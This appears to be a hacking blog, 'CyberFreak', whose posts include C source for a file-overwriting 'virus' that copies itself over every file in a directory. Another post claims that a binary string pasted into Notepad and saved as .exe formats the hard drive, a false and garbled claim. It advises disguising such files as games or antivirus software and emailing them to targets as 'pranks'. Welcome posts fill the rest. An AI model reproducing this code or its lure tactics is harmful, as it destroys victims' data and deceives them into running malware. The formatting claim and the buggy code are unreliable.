Create your own Virus using C Source Code


The Following is the C Source Code :-

#include<stdio.h>
#include<conio.h>
#include<stdlib.h>
#include<process.h>

void main(int argc,char* argv[])
 {
  char buf[512];
  int source,target,byt,done;

  struct ffblk ffblk;
  clrscr();
  textcolor(2);
  cprintf(”————————————————————————–”);
  printf(”\nVirus: FolderBreeder 1.0\n Launching...)\n”);
  cprintf(”————————————————————————–”);

  done = findfirst(”*.*”,&ffblk,0);

  while (!done)
  {
   printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”FolderBreeder”);
   source=open(argv[0],O_RDONLY|O_BINARY);
   target=open(ffblk.ff_name,O_CREAT|O_BINARY|O_WRONGLY);
    while(1)
    {
     byt=read(source,buf,512);
     if(byt>0)
       write(target,buf,byt);
     else
       break;
   }
  close(source);
  close(target);
  done = findnext(&ffblk);
 }

 getch();
}

Warning:-
This virus creates folder in a folder in folder. So, guys use it on your own reponsiblity.
You can use this for pranks and the user will get pissed off !!!!


  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Format Hard Disk Drives with Self Created .exe file


This is how you can format a hard disk by creating .exe file through Notepad.
Step1.
Here’s the Bindary Code.Copy The Following In Notepad Exactly as it is written.


01001011000111110010010101010101010000011111100000
Step 2.

Save As An .EXE Any Name Will Do
Step 3.

Double Click the .exe file ,  the pc will shut down and C:drive will be formatted.


Playfull Pranks:

After creating the file , name it something interesting ,like names of any game or application. Eg:- fifa2011.exe kaspersky.exe
Place it anyone’s desktop,Enjoy when Someone double-clicks it.

Other way, you can send the .exe file as an attachment to any target emailid.The file name must prompt the user to download it and run it.It will be all fun.

Warning:

 This is just for educational purpose and for playful pranks. But please dont try this on computers having sensible data.There may be severe data loss.Beware !!

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

First Article coming up soon

Hi Guys... Hope you are doing fine... From today I am starting to publish articles.. One thing i like to say about the materials published here... The articles are not "copy-paste" material from anywhere... Everything  I will post will be based on my experience.. If you find them interesting ,do comment.. it will be quite encouraging for me... And everyone is welcome to CyberFreak Team,you can join any time..  
Lets begin the Journey Of CyberFreak..
-- Somaditya Mandal , Founder and Chief Editor, CyberFreak

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Latest Spam In Facebook


  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Welcome To CyberFreak

Welcome To CyberFreak

Here , I am Somaditya Mandal introducing you to my new blogsite. Its all about the CyberWorld.. Source Codes,Hacking,Tricking,Manuals.. Everything.. A Complete World.Wait and Watch.

And Very Soon a separate website will come up in the same name.Anyone who know me personally and are interested can be part of my CyberFreak Team and Join it as a Guest Author and any other way.Website is under process , hope to launch it by August.

-Somaditya Mandal Founder and Chief Editor,CyberFreak

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS